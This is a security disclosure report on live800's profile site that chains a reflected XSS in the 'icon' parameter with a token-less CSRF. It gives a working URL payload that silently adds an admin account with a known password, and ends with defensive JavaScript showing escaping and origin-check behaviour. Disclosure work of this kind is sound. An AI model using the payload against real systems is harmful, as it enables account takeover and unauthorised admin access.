### Brief description:
While M was testing for XSS I barged in, found a problem of my own, and am submitting it here!
### Detailed description:
The payload first:
```
http://profile.live800.com/profile/companyInfoViewCompanyAction.action?icon=%22%3Burlx%3D%22http%3A%2F%2Fprofile.live800.com%2Fprofile%2FaddOperatorManageAction.action%22%3BDatax%3D%22loginName%3Dadmin1%26name%3Djin%26nickName%3Djin%26ability%3D100%26attendAcd%3D1%26role%3DoperatorManager%26skills%3D%26phone1%3D%26email%3D%26passWord%3Dx123123%22%3Bxmlhttp1%3Dnew%20XMLHttpRequest%3Bxmlhttp1.open(%22POST%22%2Curlx%2C!0)%3Bxmlhttp1.setRequestHeader(%22Content-Type%22%2C%22application%2Fx-www-form-urlencoded%22)%3Bxmlhttp1.send(Datax)%3B%2F%2F
```
1. First I found a CSRF. There is no token and no check of the exact referring page, but there is a same-domain check: as on Sohu Weibo, a submission that does not come from the same domain is rejected.
2. Since the CSRF is on profile.live800.com, I refreshed a few pages on the profile domain while capturing the traffic, and quickly found a reflected XSS.
open url --> http://profile.live800.com/profile/companyInfoViewCompanyAction.action?icon=%22;alert(1);//
Opening it pops the alert; you should need to be logged in (if you are not logged in the CSRF is meaningless anyway).
Because the parameter is reflected inside an inline script block (into a JavaScript string literal) rather than as a new HTML tag, the browser's XSS filter did not block it.
Now for the CSRF:
It is in: http://profile.live800.com/profile/findOperatorManageAction.action?skillId&webClass=live800.web.class.internal_Coordination
in the "add user" function of that page.
I captured the request and built this JS:
```
// Target of the forged request: the "add operator manager" action on the same origin
urlx = "http://profile.live800.com/profile/addOperatorManageAction.action";
// Form body copied from a captured add-user submission: the new account's login,
// display names, role and password, plus the other fields the form sends
Datax = "loginName=admin1&name=jin&nickName=jin&ability=100&attendAcd=1&role=operatorManager&skills=&phone1=&email=&passWord=x123123";
// Same-origin XHR: the browser attaches the victim's session cookie and a
// same-domain Referer, which is what gets it past the same-domain check
xmlhttp1 = new XMLHttpRequest;
xmlhttp1.open("POST", urlx, !0); // !0 === true: asynchronous
xmlhttp1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp1.send(Datax);
```
It is all on one line so it looks a bit messy; it simply POSTs to the add-manager action with the required fields and values.
Then put this code into the reflected XSS:
```
http://profile.live800.com/profile/companyInfoViewCompanyAction.action?icon=%22%3Burlx%3D%22http%3A%2F%2Fprofile.live800.com%2Fprofile%2FaddOperatorManageAction.action%22%3BDatax%3D%22loginName%3Dadmin1%26name%3Djin%26nickName%3Djin%26ability%3D100%26attendAcd%3D1%26role%3DoperatorManager%26skills%3D%26phone1%3D%26email%3D%26passWord%3Dx123123%22%3Bxmlhttp1%3Dnew%20XMLHttpRequest%3Bxmlhttp1.open(%22POST%22%2Curlx%2C!0)%3Bxmlhttp1.setRequestHeader(%22Content-Type%22%2C%22application%2Fx-www-form-urlencoded%22)%3Bxmlhttp1.send(Datax)%3B%2F%2F
```
Loading this URL in the browser adds a manager named jin with login ID admin1 and password x123123.
Let's run it. First, the current manager list:
![QQ20140924-1.png](https://images.seebug.org/upload/201409/24171931bec01d194559da28548b04e029bec406.png)
Only the single admin account exists. Now visit the XSS URL:
![QQ20140924-2.png](https://images.seebug.org/upload/201409/24172018dd204e0adf89fda33b7aeda020eee378.png)
Then look at the manager list again:
![QQ20140924-4.png](https://images.seebug.org/upload/201409/24172049ed130449492d62dcfde93de4ff2e13e9.png)
The account was added successfully!
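To make the two defects concrete, here is an added example in JavaScript; it is not code from the original report or from Live800. It models the reflection of `icon` into an inline script string next to a hardened renderer, and a same-domain Origin/Referer check of the kind the report describes, then shows that the XHR fired by the injected script passes that check while a cross-site request does not. The template shape, the function names (`renderIconScriptVulnerable`, `jsStringEscape`, `sameDomainCheckAllows`, `runScenario`) and the sample request headers are assumptions made for the example.

```javascript
// Added example, not from the original report: models the reflected XSS and the
// Origin/Referer-only CSRF check, and shows why chaining the two works.
// The template shape, function names and sample headers below are assumptions.

// 1. Reflected XSS in a JavaScript string context.
// Vulnerable rendering as the report describes it: `icon` is dropped verbatim into a
// double-quoted string inside an inline script, so `"` closes the literal, what
// follows runs as code and `//` comments out the rest of the line.
function renderIconScriptVulnerable(icon) {
  return '<script>var icon = "' + icon + '";</script>';
}

// Hardened rendering: every character outside a conservative allow-list becomes a
// \uXXXX escape. Quotes, backslashes, `</script>`, newlines and U+2028/2029 are all
// escaped, so none of them can end the string literal or the script block.
function jsStringEscape(value) {
  return String(value).replace(/[^A-Za-z0-9 _.-]/g, function (c) {
    return '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0');
  });
}
function renderIconScriptHardened(icon) {
  return '<script>var icon = "' + jsStringEscape(icon) + '";</script>';
}

// True when the rendered script is still exactly one string assignment, i.e. the
// untrusted value did not escape the literal.
function stringLiteralIntact(html) {
  return /^<script>var icon = "(?:[^"\\]|\\.)*";<\/script>$/.test(html);
}

// 2. CSRF defence that only checks where the request came from.
const SITE_HOST = 'profile.live800.com';

// Same-domain check of the kind the report describes: no token, just the Origin
// (or, failing that, Referer) host compared with the site's own host.
function sameDomainCheckAllows(headers) {
  const source = headers.origin || headers.referer;
  if (!source) return false;            // browsers may strip Referer: fail closed
  let host;
  try { host = new URL(source).hostname; } catch (e) { return false; }
  return host === SITE_HOST;            // whole-hostname match, not a substring test
}

// Constructed sample requests (assumed headers, not captured traffic).
// (a) Classic CSRF: a form auto-submitted from an attacker-controlled page.
const crossSiteRequest = { referer: 'http://attacker.example/csrf.html' };
// (b) The same POST issued by XMLHttpRequest from script that the reflected XSS
// injected into a page on profile.live800.com: the browser sends a same-origin
// Origin/Referer and the victim's session cookies, so the check passes.
const xssDrivenRequest = {
  origin: 'http://profile.live800.com',
  referer: 'http://profile.live800.com/profile/companyInfoViewCompanyAction.action?icon=x',
};
// (c) Look-alike host, to confirm the check compares whole hostnames.
const lookAlikeRequest = { referer: 'http://profile.live800.com.attacker.example/' };

// Runs the whole scenario and returns the observations as a plain object.
function runScenario() {
  const xssPayload = '";alert(1);//';
  return {
    vulnerableIntact: stringLiteralIntact(renderIconScriptVulnerable(xssPayload)),
    hardenedIntact: stringLiteralIntact(renderIconScriptHardened(xssPayload)),
    crossSiteAllowed: sameDomainCheckAllows(crossSiteRequest),
    xssDrivenAllowed: sameDomainCheckAllows(xssDrivenRequest),
    lookAlikeAllowed: sameDomainCheckAllows(lookAlikeRequest),
  };
}

console.log(runScenario());
```

The scenario returns `vulnerableIntact: false` and `hardenedIntact: true` for the `";alert(1);//` payload, and `crossSiteAllowed: false` but `xssDrivenAllowed: true`: the same-domain check is doing exactly what it was written to do, and it still lets the forged add-manager request through, because the request genuinely originates from the site's own origin. A per-request anti-CSRF token would stop case (a) outright, but script already running inside the origin can read the token off the page, so the fix here is output encoding at the `icon` reflection (as in `jsStringEscape`) together with a token, not a token alone.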
### Proof of vulnerability:
The payload, steps and screenshots are the same as in the detailed description above.